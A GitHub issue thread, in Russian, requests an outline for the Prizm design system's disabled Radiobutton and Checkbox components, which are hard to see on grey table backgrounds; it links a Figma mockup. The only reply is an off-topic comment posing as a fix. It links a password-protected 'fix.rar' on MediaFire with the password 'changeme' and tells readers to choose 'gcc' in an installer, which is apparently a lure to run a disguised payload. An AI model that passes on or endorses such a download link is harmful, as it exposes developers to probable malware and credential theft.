### ISSUE TITLE
[Feature] Обводка в компонент Radiobutton и Checkbox в состоянии Disable

### ISSUE THREAD

**Issue by PrizmDS** [zyfra/Prizm#2024]
@ickisIckis https://www.figma.com/design/2KJZq6hHEdxQmFMRVTJWKT/%F0%9F%92%8EPrizm.-%D0%A1omponent-base-4.0?m=auto&node-id=33610-66464&t=8ua32dIPDcjgVAd2-1

Ссылка на макет. 

Проблема: в состоянии Disable не видно компоненты на сером фоне ( шапка таблицы и зебра). 

![image](https://github.com/user-attachments/assets/eb29dbd0-e4a4-4cd3-8f5c-deb30dadf83f)

Обводка решает проблему

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
